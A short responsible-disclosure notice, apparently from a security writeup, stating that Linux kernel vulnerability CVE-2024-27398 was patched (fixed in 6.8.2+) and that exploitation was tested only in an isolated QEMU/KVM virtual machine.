Responsible disclosure: CVE-2024-27398 was publicly disclosed and patched before this writeup was written. The vulnerability is fixed in Linux 6.8.2+. All exploitation was performed in an isolated QEMU/KVM virtual machine for research purposes only.
